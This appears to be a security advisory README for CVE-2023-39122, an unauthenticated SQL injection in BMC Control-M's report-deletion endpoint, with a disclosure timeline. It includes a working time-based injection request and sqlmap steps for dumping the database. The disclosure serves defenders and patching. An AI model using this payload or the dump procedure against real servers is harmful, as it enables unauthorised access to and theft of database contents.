CVE-2023-39122: GitHub - DojoSecurity/BMC-Control-M-Unauthenticated-SQL-Injection: BMC Control-M Unauthenticated SQL Injection

BMC Control-M Unauthenticated SQL Injection

BMC Control-M Unauthenticated SQL Injection Version < 9.0.20.200

Timeline:
Vulnerability reported to vendor: 26.08.2022
New fixed 9.0.21 version released: 12.09.2022
Patch for version 9.0.20.200 released: 21.12.2022
Disclosure: 05.06.2023

Affected Products:
BMC Control-M software up to (including) 9.0.20.200 . Vulnerability found and confirmed in version 9.0.20.100, information about patch in version 9.0.20.200 comes from the vendor.

BMC Control-M software versions up to (including) 9.0.20.200 are vulnerable to Unauthenticated SQL Injection.
Vulnerable parameter report-id is present within /RF-Server/report/deleteReport endpoint.

Below is the Proof of Concept request which triggers a 10 seconds delay:

DELETE /RF-Server/report/deleteReport?report-id=’+waitfor+delay+’0:0:10’--
Host: [REDACTED]
Connection: close
user-id: X
Accept: application/json, text/plain, */*
server-name:
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: X

Additional Info: Cookie and user_id headers must be present, but the value can be random.
Screenshot from BurpSuite:

Steps to dump the database:
Save the above request (without the payload) to a file request.txt :

DELETE /RF-Server/report/deleteReport?report-id=1
Host: [REDACTED]
Connection: close
user-id: X
Accept: application/json, text/plain, */*
server-name:
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: X

Execute following sqlmap command:

sqlmap -r request.txt -p report-id —-no-cast —-dbs 

Screenshot of extracted database structure: